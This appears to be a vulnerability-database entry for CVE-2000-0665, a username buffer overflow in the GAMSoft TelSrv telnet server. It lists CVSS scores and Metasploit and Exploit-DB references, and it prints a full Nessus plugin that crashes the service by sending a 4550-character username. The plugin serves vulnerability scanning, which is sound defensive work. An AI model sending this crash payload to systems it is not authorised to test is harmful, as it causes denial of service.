Vulnerabilities > CVE-2000-0665 - Unspecified vulnerability in Gamsoft Telsrv 1.4/1.5

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
gamsoft
nessus
exploit available
metasploit

Summary

GAMSoft TelSrv telnet server 1.5 and earlier allows remote attackers to cause a denial of service via a long username.

Vulnerable Configurations

Part Description Count
Application
Gamsoft
2

Exploit-Db

descriptionGAMSoft TelSrv 1.5 Username Buffer Overflow. CVE-2000-0665. Remote exploit for windows platform
idEDB-ID:16816
last seen2016-02-02
modified2010-06-22
published2010-06-22
reportermetasploit
sourcehttps://www.exploit-db.com/download/16816/
titleGAMSoft TelSrv 1.5 Username Buffer Overflow

Metasploit

descriptionThis module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5. Other versions may also be affected. The service terminates after exploitation, so you only get one chance!
idMSF:EXPLOIT/WINDOWS/TELNET/GAMSOFT_TELSRV_USERNAME
last seen2020-05-22
modified2017-11-08
published2007-05-22
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
titleGAMSoft TelSrv 1.5 Username Buffer Overflow

Nessus

NASL familyWindows
NASL idTELSRV_DOS.NASL
descriptionIt is possible to crash the remote telnet server by sending a username that is 4550 characters or longer. A remote attacker could exploit this to crash the service, or potentially execute arbitrary code.
last seen2020-06-01
modified2020-06-02
plugin id10474
published2000-07-17
reporterThis script is Copyright (C) 2000-2018 Prizm <[email protected]
sourcehttps://www.tenable.com/plugins/nessus/10474
titleGAMSoft TelSrv 1.4/1.5 Username Overflow DoS
code
#
# This script was written by Prizm <[email protected]>
#
# See the Nessus Scripts License for details
#
# Changes by Tenable:
# - description changed somehow [RD]
# - handles the fact that the shareware may not be registered [RD]
# - revised plugin title (6/16/09)
# - changed family (6/28/09)

include("compat.inc");

if (description)
{
  script_id(10474);
  script_version("1.32");
  script_cvs_date("Date: 2018/06/27 18:42:27");

  script_cve_id("CVE-2000-0665");
  script_bugtraq_id(1478);

  script_name(english:"GAMSoft TelSrv 1.4/1.5 Username Overflow DoS");
  script_summary(english:"Crash GAMSoft TelSrv telnet server.");

  script_set_attribute(attribute:"synopsis", value:"The remote telnet server has a buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value:
"It is possible to crash the remote telnet server by sending a username
that is 4550 characters or longer. A remote attacker could exploit
this to crash the service, or potentially execute arbitrary code.");
  #https://web.archive.org/web/20000819132410/http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0031.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2999867b");
  script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'GAMSoft TelSrv 1.5 Username Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/07/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2000/07/17");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2000-2018 Prizm <[email protected]");
  script_family(english:"Windows");

  script_dependencie("telnetserver_detect_type_nd_version.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/telnet", 23);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("telnet_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_service(svc:"telnet", default: 23, exit_on_fail: 1);

soc = open_sock_tcp(port);
if (! soc) exit(1);

  r = telnet_negotiate(socket:soc);
  r2 = recv(socket:soc, length:4096);
  r = r + r2;
if(r)
{
  r = recv(socket:soc, length:8192);
  if("5 second delay" >< r)sleep(5);
  r = recv(socket:soc, length:8192);
  req = string(crap(4550), "\r\n");
  send(socket:soc, data:req);
  close(soc);
  sleep(1);

  soc2 = open_sock_tcp(port);
  if(!soc2)
  {
    if (service_is_dead(port: port, exit: 0) <= 0)
      exit(1, "Could not reconnect to port "+port+".");
    security_hole(port);
  }
  else {
        r = telnet_negotiate(socket:soc2);
	r2 = recv(socket:soc2, length:4096);
	r = r + r2;
        close(soc2);
        if(!r)security_hole(port);
      }
}


Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/83042/gamsoft_telsrv_username.rb.txt
idPACKETSTORM:83042
last seen2016-12-05
published2009-11-26
reporterPatrick Webster
sourcehttps://packetstormsecurity.com/files/83042/GAMSoft-TelSrv-1.5-Username-Buffer-Overflow.html
titleGAMSoft TelSrv 1.5 Username Buffer Overflow